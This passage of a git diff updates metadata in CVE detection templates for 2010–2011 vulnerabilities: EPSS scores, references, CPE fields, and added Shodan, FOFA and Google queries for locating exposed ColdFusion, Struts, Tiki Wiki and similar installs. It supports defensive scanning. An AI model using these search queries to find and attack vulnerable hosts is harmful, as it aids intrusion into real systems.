0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 343bae62dc..a37a5e8a6a 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.93171 + epss-percentile: 0.93322 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index a26d5378db..566e691bbf 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80104 + epss-percentile: 0.8192 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index ab3290bddd..d8919a69c7 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 - http://www.exploit-db.com/exploits/12182 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 0710e11ab6..931cc3a490 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90668 + epss-percentile: 0.91571 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 69adbf9bbd..879955f14d 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.01827 - epss-percentile: 0.86946 + epss-percentile: 0.88212 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index a3f6f5ad1f..d657b8093c 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index a6e5e7208e..1f7465f851 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.79951 + epss-percentile: 0.80337 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 06afaa24fb..e06e190f6d 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01385 - epss-percentile: 0.86058 + epss-percentile: 0.86323 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index b1ef080b2e..6c457012db 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -13,13 +13,14 @@ info: - https://www.exploit-db.com/exploits/12151 - https://nvd.nist.gov/vuln/detail/CVE-2010-1535 - http://www.exploit-db.com/exploits/12151 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78254 + epss-percentile: 0.80337 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 82d4d0479b..70e02b87f1 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.91267 + epss-percentile: 0.91491 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index ba9f57adb0..35daa2bd86 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.87577 + epss-percentile: 0.87848 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 58f4abbb84..9d241f2807 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.91355 + epss-percentile: 0.91571 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 9a911b9473..8aef850eec 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.87665 + epss-percentile: 0.87931 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 19d33fcac3..72dc18f295 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86853 + epss-percentile: 0.88135 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 91ec26c65c..9288a4e941 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -12,13 +12,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 709a568761..34fe12b934 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.81565 + epss-percentile: 0.8192 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index a0435899d9..9970e98d4a 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87487 + epss-percentile: 0.88678 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 64875ad48b..79558d6a05 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache http: diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index bf0c409599..07b578d433 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.85196 + epss-percentile: 0.85468 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 1aa77d90cf..b6d585837a 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.93171 + epss-percentile: 0.93322 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 7bcf1b5fd8..69eff5b4e1 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12238 - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86287 + epss-percentile: 0.87631 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 988470fe0d..f02fa9f751 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92761 + epss-percentile: 0.93494 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 5b0064eee5..5e3c5d603c 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index f94756a8b9..5c0a1d9858 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -11,13 +11,14 @@ info: reference: - https://www.exploit-db.com/exploits/12083 - https://nvd.nist.gov/vuln/detail/CVE-2010-1977 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80059 + epss-percentile: 0.8192 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 819296c630..e1a7228413 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73222 + epss-percentile: 0.75733 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index fa16b9b5dc..0864d1ca53 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2036 cwe-id: CWE-22 - epss-score: 0.00718 - epss-percentile: 0.7851 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 52e7647055..d55d60e19c 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2037 cwe-id: CWE-22 - epss-score: 0.00718 - epss-percentile: 0.7851 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 2fafc5155a..1af5b47a92 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90637 + epss-percentile: 0.91571 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index e37ce9a665..5cbf79630a 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 99fde06630..5920648367 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80059 + epss-percentile: 0.8192 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index f89f1e0f29..a0d36c2f90 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2010-2861 cwe-id: CWE-22 epss-score: 0.97078 - epss-percentile: 0.99753 + epss-percentile: 0.9977 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi http: diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 1546f38fc8..a9a05bcd4e 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.90478 + epss-percentile: 0.90703 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index eb6d38cbf0..73053d63fa 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 - epss-score: 0.00626 - epss-percentile: 0.76748 + epss-score: 0.02682 + epss-percentile: 0.90436 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 85c0b4a3a6..b7eeed4fc6 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.87178 + epss-percentile: 0.87445 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 7f6b76880d..1c20c4d676 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - epss-score: 0.03038 - epss-percentile: 0.90751 + epss-score: 0.02675 + epss-percentile: 0.90421 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2010,tikiwiki,lfi,tiki http: diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 4feec95d93..c3053847e4 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: artica product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica http: diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 29d6cfbc01..e93934f80a 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.0016 - epss-percentile: 0.51628 + epss-percentile: 0.52542 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 7504999138..a8375704d5 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.00316 - epss-percentile: 0.67285 + epss-percentile: 0.70272 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 55d16d1977..1c896d34d7 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -20,13 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - epss-score: 0.06122 - epss-percentile: 0.93381 + epss-score: 0.06135 + epss-percentile: 0.93535 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: modx product: modx_revolution + shodan-query: cpe:"cpe:2.3:a:modx:modx_revolution" tags: cve,cve2010,lfi,edb,packetstorm,modx http: diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 58bfcca251..e0f0e837c0 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2010-5286 cwe-id: CWE-22 - epss-score: 0.07071 - epss-percentile: 0.93832 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index f97802ff95..c1ddb90003 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2011-0049 cwe-id: CWE-22 - epss-score: 0.96615 - epss-percentile: 0.99548 + epss-score: 0.8814 + epss-percentile: 0.98672 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 3019f09e60..c1e41eb263 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.86842 + epss-percentile: 0.87103 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index f51495187f..c20a0b9cc0 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.91127 + epss-percentile: 0.91341 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index af1291bb6b..af3473daeb 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -24,6 +24,8 @@ info: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2011,seclists,xss,tikiwiki,tiki http: diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index 369e9bebd4..d13df930f1 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -14,12 +14,15 @@ info: cvss-score: 4 cve-id: CVE-2011-4640 cwe-id: CWE-22 - cpe: cpe:2.3:a:spamtitan:spamtitan:*:*:*:*:*:*:*:* + epss-score: 0.05544 + epss-percentile: 0.93225 + cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:* metadata: max-request: 3 - product: spamtitan vendor: spamtitan + product: webtitan shodan-query: title:"WebTitan" + fofa-query: icon_hash=1090061843 tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated http: diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index e834c2ac52..4dfc679b6d 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - epss-score: 0.0358 - epss-percentile: 0.9073 + epss-score: 0.44913 + epss-percentile: 0.97396 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index d13526871a..30bc5aedd9 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01792 - epss-percentile: 0.86796 + epss-percentile: 0.88084 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: adminimize google-query: inurl:"/wp-content/plugins/adminimize/" tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index a5a828c58b..fa5f475e5c 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00434 - epss-percentile: 0.7412 + epss-percentile: 0.74554 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 968b0da94d..f43ff4cd7c 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -13,13 +13,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71803 + epss-percentile: 0.74451 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -27,7 +29,6 @@ info: product: clickdesk_live_support-live_chat_plugin google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 9b02ab22c5..8633d31758 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00478 - epss-percentile: 0.75288 + epss-percentile: 0.75781 cpe: 